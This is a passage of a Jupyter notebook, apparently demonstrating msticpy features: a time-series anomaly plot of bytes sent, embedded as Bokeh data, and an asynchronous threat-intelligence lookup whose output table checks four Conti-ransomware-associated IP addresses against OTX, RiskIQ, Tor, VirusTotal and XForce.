uG/GRKwT94wx4wPz/xP4qF4yboD+k/PJcUNL3W6j+UNJuMxETwP/zU7+Y8hPA/QhYbH/1DxD/Ohzd8hG/VP9Sk3o/+Y+k/+lgh+Ggh6z98oH8G8pnxP9RWODAHywnAd7+nEN4A8T9Z4heEjaDuP7H7fxGOLfg/0c6n5xVB8z+tP9b8J+v7P4L5E3dnCPM/HQS5hjqj9T8W4gM4lI8BQHZ0HMCE4QJAARAn/BFX/z+2cHoWUegDQOqqZiB1xgrAP73/9l5JAMDOmrDI3m/+v7deaw9Uq/u/W/pwrw3H+L9LNrgQnRTpvyLu44sZL/W/Tsv2RZ8A7L9dtAYzVmHYvz8ZGhBeC++/C7ccFvle9L9J2OQDyJfsv9m+b/ASb9s/PddZR0qH0r8Lw3JaTDvkv8goDKKuX+S/xaFteG0V8L8U01bpDXTPv9dmBaFVJOW/jP6MkMsczL91BivJBqXhv5I98m455ui/Y0Yt4SF21b921ZSFTCTtv/Rn/rFHXfe/DnOFd8uJ8z85DlCWrwjpP2es41RCOOo/3lw0oIkz4z+uoPvMx0u9P2dCSOTLrdY/KfCEWX2Q2T+XZEfzDVOxP5lEpbGHD9Y/TsTTrXjx2D8XX+UAypmpv7O4IUvVrOY/d+FHtjqT1r+E+sWGcxG2v4YKVFxg09G/N1I6y3UIwT954+agfh/kv22yMH9AA8m/M1UT91yL4L/f45sYeKfjv8yih/akFeC/8fsbXupv5r8hiQIxxvvhv0P5dRWjDgJA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[840]},\"seasonal\":[93515986,90183587,63387257,86512728,86106072,105324730,89548775,52531656,63431446,49672271,43255924,-7902940,9604818,-39774346,20478825,-21862136,8542505,-31098483,-19147780,-175118885,-214495129,-165357089,-161602268,45763822,81746572,66043248,54705231,67301852,78183958,80340896,76425515,40281820,65656500,26360474,38401191,284897,12894133,-12467611,21260341,867701,18610953,-15767590,-10832157,-160723977,-180358494,-147966456,-150748756,34631614,65275193,40142382,44578984,44946944,68673828,55372679,59639386,27563375,66617003,4498985,33197035,8275439,14153083,13035840,24472447,23425781,29851202,3135511,2621831,-143389494,-144671034,-124441916,-134815456,19651272,43735129,11197944,30103479,24768433,58976790,27537527,44704449,15604895,64987193,-18004866,31088876,12948608,15054510,41257683,31981531,47220418,41881715,26907921,26547082,-120563857,-101711888,-89216746,-105895710,11876868,8290842,-9141115,9767643,5072458,52651189,-31146041,30138440,11969373,47786586,-24698974,19734671,11794235,1835159,34222544,30892546,40871831,26823788,44395536,43005437,-124553748,-114080442,-87864926,-110411196,44308188,24367659,25190771,27448086,32346297,71027028,-67223086,35857241,30755471,49620926,-12212614,9561829,-1384992,-1551938,12824549,16852461,12905849,-3917770,32481668,34376414,-149890047,-166888387,-125109659,-147211007,98304113,68959521,83244911,54725681,80131020,95902952,-38334956,58193747,16332386,58312263,2163185,4537242,-7301519,6133045,-7663258,4818031,-22822832,-27042188,6413424,7613439,-176990822,-220243544,-181596448,-190243828,138628722,119976842,126114925,85115393,120349497,116566098,12282094,89144587,-24958477,68101658,23101455,-241962,-1453783,23782507,-7754703,-4315313,-42533829,-34365061,-16933805,-21086557,-197816516,-242539064,-220745227,-216917000,136056039,124798809,124818463,96248519,127886087,113775651,87499515,91334814,-28822833,74440345,35820951,-1978382,743624,34936780,-2449693,13295543,-28104788,-14972615,-13968941,-21052647,-178993018,-211793673,-192042843,-188433060,79333683,76858669,74064381,67601586,94333458,89125381,100961458,63616192,-21792728,70718169,34559259,-7594027,1920684,37529059,998249,34491411,5815245,10590334,14692497,3254207,-154143528,-165807680,-142537925,-138633962,29048381,24578569,19166124,33544440,50734917,55631125,60176944,31080566,26351370,61020191,19303838,-16575895,35728338,29263780,-5110992,43067225,37127974,25338077,45436874,37306284,-129850087,-125407572,-92678207,-94462341,2027822,-3209347,-13528429,1158114,18591289,22367988,32114398,4756476,55339399,51698435,-12494205,-18168919,90802473,999166,-12360026,27969994,37486225,25403812,43624490,42458187,-138342850,-128089522,-102024088,-111133343,31073540,28274163,13555817,20581354,27547251,29147328,39070820,16898066,56342941,52492346,-29693414,-12548111,102945427,-16000065,-11601356,3648477,16021434,15605358,19073989,28853957,-177899796,-161225454,-144578117,-158949242,79086687,69740993,58890064,60965235,64893587,54507027,67840269,43971105,64756683,56335172,-28975280,-52418,87203340,-19426322,-16177641,-17635320,-14241056,8336224,-19850038,2225159,-210164672,-200309298,-193562184,-215393260,121776547,96199842,99937063,101841632,99615584,78296973,103888245,67735847,76570609,69006639,-17825558,12628354,19777622,-23214308,-19810464,-21643644,9684442,6498366,-45639144,-16543914,-221302504,-224792096,-212350472,-234492681,132699326,92701837,112188888,105353373,117755820,82767841,111574714,65713831,65887186,73188999,-12158564,11841117,-11541624,-11486409,-25571306,-14859542,90423764,17203491,-36098808,-1272148,-196937094,-195329015,-176538235,-194435032,91336317,50634664,74468853,64485846,93256117,46164792,81468494,40440217,48206920,67752720,-16627772,8892522,1189377,-3911030,-27397975,-5887844,127862255,31318793,-3553478,24984059,-150872991,-149080506,-122539834,-137354599,49039321,6438218,30913639,18156252,56572095,17949119,37622692,23614816,38571550,52116890,-12081437,4731920,6807451,-158879,-18815022,1906049,138985933,45421684,27243396,52160181,-111567693,-108852571,-74210617,-94817971,14876710,-21997747,3972480,-5589071,27849185,10668054,8693795,27671981,38111257,29338992,-2924870,-2683138,3881496,2610186,-6865999,-3133277,70464258,32537040,32748109,58583396,-108588727,-121909647,-80973875,-104451894,32371623,2844010,24993710,18671590,39473719,27841775,26441052,54537193,56384944,27885028,18094034,-4066078,2921452,-10830840,-4867851,-16932566,1403134,-1689261,14902502,36692823,-140366517,-159714622,-127023951,-147533666,66330495,62006535,74286331,61620181,65342514,51606446,60407955,78599709,71645736,39862521,33691579,-7752063,8031274,-13686144,-9219741,-41104525,-19823475,-36318054,-9627777,9063623,-191400213,-190477028,-184801950,-193567838,89538010,117571076,124457748,99276053,86287388,59795624,90111027,97133787,75078038,55298788,43491628,-2289178,19404256,-5514895,-18252426,-57142025,-21478194,-52626649,-11648124,-18016155,-226165167,-203213250,-221146633,-215334279,94133995,137379850,142876033,108703716,78130084,53957771,96303472,95651719,81141205,70190121,45126119,12752543,31286549,11357947,-23884979,-55169057,-12417973,-29042619,12168717,-18016568,-206863623,-177547007,-201823562,-190463526,99869061,91875446,104534622,70406524,42656043,35620334,65317418,83113429,67989135,55901111,21047094,23226431,31169004,22886101,-17434703,-33582194,-895476,4373757,37562318,453525,-174349526,-152525507,-154816363,-147485134,127718903,37385268,53949776,23796572,23886528,20027257,30974855,64962866,54966000,43354095,-5512956,19720954,24842468,18782964,-5180676,492896,8034096,20045790,53003390,28988091,-133030397,-132954931,-107012826,-104661009,120862671,1536686,23026679,-12302806,22698289,14246783,7723512,49250125,48919139,44961860,-17498083,9091143,7016854,174875,2003802,14212827,9810167,-1201505,42403718,36392340,-126467368,-141725941,-107067265,-119830893,132784944,18554278,33690246,584577,48139347,35680883,15327985,59926133,52049592,59566415,-5158461,3892102,-11182962,-10954094,2422398,17200946,5647954,-32155590,16214823,24548339,-149014887,-172567438,-146454547,-160071348,114956320,58094759,71809723,38577222,77893654,56731794,41480287,77750927,66052323,83127937,19966319,2267348,-15129548,-8888320,-8051963,5016153,-5805006,-55154753,-8419098,-4873801,-177683752,-199534290,-194172502,-209988072,113432368,89147378,108819809,81201371,94839205,83916106,67612975,92585027,80892391,95203052,35643930,-1347559,-12890377,8199466,-26542496,-8763033,-8797491,-59640316,-24949039,-34068462,-199113391,-205699629,-216255013,-235312839,118163139,99963566,119393943,92909517,101583844,87827234,68474731,99603479,82378516,81576678,38794149,-3928918,5448126,30345523,-32778531,-5402631,3274929,-36030288,-13037316,-29999924,-186777711,-171098789,-181910520,-190375238,73484322,65553296,96257907,66721135,77389255,62862975,56219648,74259308,62424395,62262213,35240438,207428,-22170704,41785948,-28855516,9387204,24048237,-4981986,10269232,-13459607,-148249880,-125504736,-132398618,-133081024,27129696,22718622,62339834,34206600,49006265,49314746,42937488,45259497,45505068,51622649,22745641,5238692,-81655172,47790599,-21154691,33775494,36631426,33893670,28548204,16930625,-109031366,-91857444,-93273801,-84980834,2212028,3254061,24012113,18929131,20899780,30883044,25172166,22105317,33073585,57695977,3759971,-2757774,-81289635,36259579,-20605835,47244815,36952419,43992616,27468990,39918578,-106028816,-96660010,-95486029,-94450745,107437718,-2757351,-2466122,16433674,934339,17679347,14052530,2349877,22621044,71635030,-9694234,-9714624,-85569475,23587499,-18809802,62332046,42492595,52430217,26961919,62074117,-102145767,-98595039,-98727694,-103502399,230351733,-12103973,-34530836,11150894,-23802890,2609286,-1795627,-18677730,12892026,86297284,-26337606,-22166639,-80368737,8585259,-19207105,74131328,46599324,57277777,23032686,81888069,-103472574,-105886316,-106995251,-121193760,369293216],\"trend\":[791813560,793954323,796082001,798195962,800295629,802380022,804447972,806498433,808529739,810540272,812529410,814496941,816442716,818367460,820273144,822162345,824038229,825905278,827770492,829642744,831531345,833444945,835385711,837341820,838862017,840250670,841482884,842538643,843399287,844056247,844520874,844820001,844989495,845062805,845078093,845087195,845127911,845221372,845378739,845626996,845991471,846465805,847021819,847627283,848233322,848786611,849253558,849632012,849924258,850146061,850347778,850606108,850990385,851550897,852324683,853318616,854516750,855908915,857468818,859141556,860878634,862643408,864399711,866099499,867691369,869138857,870424458,871535026,872472981,873241000,873844279,874282699,874547193,874632652,874565408,874388684,874164793,873967413,873853079,873859554,874014444,874328729,874789620,875372797,876030820,876715592,877380088,877983354,878513451,878979207,879393402,879759908,880074777,880338038,880536497,880659117,880714932,880682281,880412864,879667868,878172871,875659111,871888025,866697016,860000181,851739201,841894000,830482534,817564803,803240507,787642126,770906763,753181350,734634681,715452075,695831407,675978050,656082183,636277979,616622211,597144688,577886977,558899999,540256534,522039743,504343936,487295632,471007841,455534676,440973020,427463444,415157438,404185348,394625915,386528264,379911678,374741265,370905595,368225292,366469694,365385989,364746772,364409079,364345411,364554286,365063438,366025592,367662842,370215981,373908012,378940603,385477444,393652391,403537641,415153803,428454940,443355405,459735165,477422740,496229601,515961834,536446498,557530876,579069984,600929345,622996471,645194928,667472133,689791803,712098230,734287187,756232110,777807312,798885044,819262655,838720936,857070377,874108370,889593307,903334387,915207172,925175987,933295307,939677593,944496630,947961925,950328520,951905610,953012182,953923725,954811587,955717789,956643223,957579170,958505534,959392450,960200562,960885757,961425804,961806741,962055116,962245896,962483965,962875153,963502718,964408857,965604635,967090224,968844634,970819609,972931576,975077281,977153220,979055758,980706895,982067900,983115576,983846216,984273409,984415503,984304170,983997752,983613076,983296088,983117555,983103422,983269671,983606730,984099302,984723220,985440603,986205102,986962146,987674881,988323494,988891968,989360060,989719429,989973595,990136896,990220115,990237674,990242150,990318854,990561501,991047716,991811532,992857399,994181415,995763124,997567404,999541050,1001622392,1003745092,1005820842,1007782754,1009587068,1011216932,1012670300,1013940319,1015038399,1015987933,1016813541,1017543198,1018218619,1018845817,1019288513,1019296261,1018562067,1016771837,1013650963,1008967917,1002564724,994351859,984313876,972504123,959007829,943972798,927642293,910249698,892006653,873105432,853732454,834071748,814292578,794537865,774908681,755440684,736126139,716953279,697939740,679154650,660697231,642691190,625262314,608552161,592726106,577970576,564492299,552491681,542101406,533378297,526301166,520806549,516805694,514147038,512625041,512004120,512024496,512428358,513029379,513775188,514672161,515785196,517298555,519465077,522573674,526903314,532701562,540149566,549335681,560254419,572783551,586722583,601929919,618279271,635633506,653859356,672815332,692371832,712403622,732788194,753426668,774262694,795257004,816377277,837587541,858824963,879980204,900907031,921423694,941329319,960406635,978445065,995269107,1010749099,1024801744,1037379906,1048439564,1057953852,1065925928,1072404133,1077497357,1081367588,1084200781,1086241632,1087762370,1089014821,1090181023,1091316687,1092440529,1093563547,1094679360,1095757181,1096766227,1097694494,1098553832,1099380624,1100217046,1101086918,1102013421,1103021531,1104113456,1105294464,1106567143,1107912516,1109295872,1110700902,1112171303,1113723298,1115316884,1116886046,1118370945,1119744421,1120988328,1122084481,1123028438,1123857154,1124618187,1125343433,1126052407,1126746111,1127422292,1128074169,1128691947,1129281021,1129844480,1130390588,1130966657,1131650647,1132462846,1133362966,1134268391,1135090746,1135776079,1136286354,1136592557,1136687959,1136582391,1136305823,1135923539,1135500394,1135100105,1134787157,1134629254,1134675391,1134952421,1135486588,1136298393,1137392193,1138765190,1140376457,1142116773,1143832372,1145446889,1146943772,1148317729,1149569543,1150696949,1151700566,1152589396,1153367329,1154021599,1154495565,1154617800,1154136745,1152777411,1150276984,1146409945,1141017112,1133987254,1125267471,1114850428,1102754733,1089040488,1073822752,1057259108,1039547690,1020893292,1001487237,981522354,961204089,940721334,920237835,899867715,879661563,859656579,839899505,820444824,801360154,782739767,764695564,747348129,730824700,715265651,700808202,687578493,675699749,665278745,656390914,649069901,643296628,638996394,636043534,634253480,633383934,633176905,633396150,633883798,634590884,635510968,636684117,638280540,640560677,643793875,648238148,654101244,661524458,670591998,681321979,693693932,707648046,723072973,739823063,757749535,776689853,796460002,816883130,837785069,859007715,880429985,901970289,923587072,945277985,967044137,988844298,1010563132,1032029275,1053046304,1073398499,1092876962,1111293042,1128469309,1144248685,1158482018,1171042682,1181856452,1190891436,1198164540,1203766980,1207861166,1210665298,1212469289,1213599560,1214380022,1215078147,1215847711,1216715425,1217670982,1218702693,1219772707,1220848172,1221912348,1222959791,1223985858,1224980625,1225951003,1226922622,1227941726,1229065370,1230353035,1231855624,1233605705,1235610638,1237845738,1240245294,1242710265,1245138105,1247423477,1249477482,1251246182,1252701379,1253817131,1254580563,1254991976,1255081247,1254907849,1254543237,1254058668,1253537880,1253061538,1252691332,1252475195,1252442906,1252598542,1252939871,1253459630,1254131406,1254919416,1255776222,1256649549,1257493249,1258259532,1258905214,1259408006,1259777276,1260018326,1260165718,1260363299,1260753080,1261425727,1262439459,1263833102,1265609451,1267731052,1270144659,1272778717,1275537105,1278317728,1281029153,1283588270,1285928420,1287998139,1289781741,1291277254,1292480578,1293406996,1294091622,1294567138,1294866863,1295015308,1294980600,1294585078,1293575779,1291677563,1288615256,1284152954,1278098183,1270313747,1260722979,1249314108,1236148027,1221344082,1205060504,1187484875,1168816986,1149272871,1129081520,1108486767,1087722217,1066989200,1046440262,1026156806,1006126141,986366650,966914116,947786324,929016143,910672127,892859552,875703123,859371236,844053950,829921163,817115403,805760111,795944875,787715759,781062379,775934102,772235279,769818374,768483898,767997605,768107550,768577249,769253756,770109017,771122015,772304997,773811331,775877709,778768229,782730906,787970114,794616988,802747603,812407279,823593965,836251461,850293968,865615351,882106339,899645100,918101949,937336068,957195796,977538226,998247870,1019244153,1040473142,1061904675,1083511886,1105249080,1127010588,1148635766,1169925889,1190676284,1210681804,1229738392,1247649346,1264233448,1279348624,1292899872,1304818683,1315061466,1323619781,1330538926,1335923660,1339939311,1342810196,1344796384,1346173352,1347190501,1348022467,1348725623,1349320591,1349818823,1350218760,1350516600,1350723666,1350853810,1350930761,1351007563,1351137857,1351373248,1351762479,1352343955,1353143994,1354173272,1355446280,1356970637,1358720817,1360645841,1362689120,1364798529,1366907333,1368939252,1370827117,1372547813,1374100179,1375485120,1376718237,1377847233,1378917879,1379967312,1381026599,1382096701,1383174736,1384265283,1385363751,1386456776,1387539643,1388630523,1389769485,1390969734,1392225565,1393503908,1394744132,1395864230,1396797905,1397502022,1397954295,1398141076,1398056620,1397716901,1397175387,1396492157,1395741522,1395005891,1394352499,1393839471,1393519032,1393416608,1393532904,1393842228,1394317196,1394901864,1395459326,1395878624,1396101371,1396121861,1395964277,1395666487,1395257210,1394759051,1394202926,1393617838,1393018234,1392386522,1391569117,1390338184,1388452181,1385667653,1381777472,1376634316,1370121501,1362141412,1352625659,1341532201,1328880054,1314757811,1299318255,1282739616,1265201618,1246875898,1227938644,1208581426,1188986776,1169308043,1149644056,1130032379,1110489225,1091019003,1071638578,1052431410,1033529444,1015101165,997334211,980404366,964478021,949726533,936339809,924523262,914375079,905917534,899126468,893919536,890158117,887660834,886197653,885487767,885250173,885247454,885333786,885496191,885739083,886141958,886649686,887397609,888364711,889501250,890762866,892113973,893526169,894976933,896447729,897923128,899390568,900839121,902260555,903648892,905000046,906311232,907581750,908812427,910005920,911166846,912301578,913418445],\"weights\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"5548\"},\"selection_policy\":{\"id\":\"5547\"}},\"id\":\"5509\",\"type\":\"ColumnDataSource\"},{\"attributes\":{},\"id\":\"5548\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"5547\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"TotalBytesSent\",\"@TotalBytesSent\"],[\"residual\",\"@residual\"],[\"trend\",\"@trend\"],[\"seasonal\",\"@seasonal\"],[\"weights\",\"@weights\"],[\"baseline\",\"@baseline\"],[\"score\",\"@score\"]]},\"id\":\"5368\",\"type\":\"HoverTool\"}],\"root_ids\":[\"5521\"]},\"title\":\"Bokeh Application\",\"version\":\"2.4.2\"}};\n const render_items = [{\"docid\":\"f778c214-9c95-4c26-bea6-7f6cc4b14ae8\",\"root_ids\":[\"5521\"],\"roots\":{\"5521\":\"d0cb17cb-6f00-4268-8691-0b6b748ec723\"}}];\n root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n }\n if (root.Bokeh !== undefined) {\n embed_document(root);\n } else {\n let attempts = 0;\n const timer = setInterval(function(root) {\n if (root.Bokeh !== undefined) {\n clearInterval(timer);\n embed_document(root);\n } else {\n attempts++;\n if (attempts > 100) {\n clearInterval(timer);\n console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n }\n }\n }, 10, root)\n }\n})(window);", "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "5521" } }, "output_type": "display_data" }, { "data": { "text/html": [ "
Column(
id = '5762', …)
align = 'start',
aspect_ratio = None,
background = None,
children = [Figure(id='5369', ...), Figure(id='5490', ...)],
css_classes = [],
disabled = False,
height = None,
height_policy = 'auto',
js_event_callbacks = {},
js_property_callbacks = {},
margin = (0, 0, 0, 0),
max_height = None,
max_width = None,
min_height = None,
min_width = None,
name = None,
rows = 'auto',
sizing_mode = None,
spacing = 0,
subscribed_events = [],
syncable = True,
tags = [],
visible = True,
width = None,
width_policy = 'auto')
\n", "\n" ], "text/plain": [ "Column(id='5762', ...)" ] }, "execution_count": 100, "metadata": {}, "output_type": "execute_result" } ], "source": [ "from msticpy.analysis import timeseries\n", "ts_data = pd.read_csv(\"data/TimeSeriesDemo.csv\", parse_dates=[\"TimeGenerated\"])\n", "\n", "ts_data.mp_timeseries.analyze(\n", " time_column=\"TimeGenerated\", data_column=\"TotalBytesSent\"\n", ").mp_timeseries.plot(y=\"TotalBytesSent\")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Threat Intel Lookup\n", "\n", "Previously, when using multiple providers, indicators were\n", "sent to each provider in sequence. Large number of indicators\n", "caused notebook to appear to have hung.\n", "\n", "V 2.0:\n", "\n", "- sends requests to each provider asynchronously.\n", "- displays progress bar" ] }, { "cell_type": "code", "execution_count": 102, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n" ] }, { "name": "stderr", "output_type": "stream", "text": [ "Observables processed: 100%|██████████| 24/24 [00:11<00:00, 2.10obs/s]\n" ] }, { "data": { "text/html": [ "
\n", "\n", "\n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", " \n", "
IocIocTypeSanitizedValueQuerySubtypeProviderResultSeverityDetailsRawResultReferenceStatus
0162.244.80.235ipv4162.244.80.235NoneOTXTruehigh{'pulse_count': 45, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co...{'whois': 'http://whois.domaintools.com/162.244.80.235', 'reputation': 0, 'indicator': '162.244....https://otx.alienvault.com/api/v1/indicators/IPv4/162.244.80.235/general0
1185.141.63.120ipv4185.141.63.120NoneOTXTruehigh{'pulse_count': 35, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co...{'whois': 'http://whois.domaintools.com/185.141.63.120', 'reputation': 0, 'indicator': '185.141....https://otx.alienvault.com/api/v1/indicators/IPv4/185.141.63.120/general0
282.118.21.1ipv482.118.21.1NoneOTXTruehigh{'pulse_count': 36, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co...{'whois': 'http://whois.domaintools.com/82.118.21.1', 'reputation': 0, 'indicator': '82.118.21.1...https://otx.alienvault.com/api/v1/indicators/IPv4/82.118.21.1/general0
385.93.88.165ipv485.93.88.165NoneOTXTruehigh{'pulse_count': 22, 'names': ['MS-ISAC: Joint Cybersecurity Advisory: Conti Ransomware', 'Conti ...{'whois': 'http://whois.domaintools.com/85.93.88.165', 'reputation': 0, 'indicator': '85.93.88.1...https://otx.alienvault.com/api/v1/indicators/IPv4/85.93.88.165/general0
0162.244.80.235ipv4162.244.80.235NoneRiskIQTruehigh{'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article...{'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article...https://community.riskiq.com0
1185.141.63.120ipv4185.141.63.120NoneRiskIQTruehigh{'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'...{'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'...https://community.riskiq.com0
282.118.21.1ipv482.118.21.1NoneRiskIQTruehigh{'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article...{'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article...https://community.riskiq.com0
385.93.88.165ipv485.93.88.165NoneRiskIQTruehigh{'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article...{'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article...https://community.riskiq.com0
0162.244.80.235ipv4162.244.80.235NoneTorTrueinformationNot found.Nonehttps://check.torproject.org/exit-addresses0
1185.141.63.120ipv4185.141.63.120NoneTorTrueinformationNot found.Nonehttps://check.torproject.org/exit-addresses0
282.118.21.1ipv482.118.21.1NoneTorTrueinformationNot found.Nonehttps://check.torproject.org/exit-addresses0
385.93.88.165ipv485.93.88.165NoneTorTrueinformationNot found.Nonehttps://check.torproject.org/exit-addresses0
0162.244.80.235ipv4162.244.80.235NoneVirusTotalTruehigh{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 35, 'detected_urls': [...{'asn': 19624, 'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-03 16:53...https://www.virustotal.com/vtapi/v2/ip-address/report0
1185.141.63.120ipv4185.141.63.120NoneVirusTotalTruehigh{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 19, 'detected_urls': [...{'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-05 03:45:47', 'positiv...https://www.virustotal.com/vtapi/v2/ip-address/report0
282.118.21.1ipv482.118.21.1NoneVirusTotalTruehigh{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 42, 'detected_urls': [...{'asn': 204957, 'undetected_urls': [['http://bkgs0007.nov.com/', 'fe9ad6fcfd8214a3898853b5dec208...https://www.virustotal.com/vtapi/v2/ip-address/report0
385.93.88.165ipv485.93.88.165NoneVirusTotalTruehigh{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 7, 'detected_urls': ['...{'asn': 8972, 'undetected_urls': [['https://bbb.edu-cisco.org/', '6adc598e2c5362b5f5facad921d0f0...https://www.virustotal.com/vtapi/v2/ip-address/report0
0162.244.80.235ipv4162.244.80.235NoneXForceFalseinformationAuthorization failed. Check account and key details.<Response [401 Unauthorized]>https://api.xforce.ibmcloud.com/ipr/162.244.80.235401
